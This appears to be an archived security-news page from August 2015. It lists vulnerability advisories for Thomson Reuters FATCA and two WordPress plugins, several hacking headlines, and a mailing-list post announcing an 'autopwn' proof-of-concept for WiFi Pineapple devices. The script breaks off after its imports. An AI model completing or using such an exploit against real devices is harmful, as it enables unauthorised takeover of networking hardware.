Thomson Reuters FATCA suffers from an arbitrary file upload vulnerability that can result in command execution.
Monthly Archives: August 2015
WordPress Monetize 1.03 Cross Site Request Forgery / Cross Site Scripting
WordPress Monetize plugin version 1.03 suffers from cross site request forgery and cross site scripting vulnerabilities.
WordPress Bookmarkify 2.9.2 Cross Site Request Forgery / Cross Site Scripting
WordPress Bookmarkify plugin version 2.9.2 suffers from cross site request forgery and cross site scripting vulnerabilities.
Hack A Garage And Car Inside With A Child's Toy And A Few Chips
US Govt Email Systems Downed In Russian Cyber Attack
Hackers Breach 2.4 Million Records From Carphone Warehouse
Gone In Less Than A Second
Pineapple autopwn script 2.3.0 or lower versions.
Posted by Electric Mind on Aug 08
I have wrote PoC half a year ago, because i needed to try it on my Chinese router, and it still works on freshly
purchased pineapple devices. (hello from Defcon 😉 )
And guys, it’s not a talk for the defcon, especially if you have done a botnet based on that shit… 😉
See ya tomorrow at WiFi village…
POC is below:
#!/usr/bin/env python
from random import choice
from urllib import urlencode
from httplib import HTTPConnection
settings = {…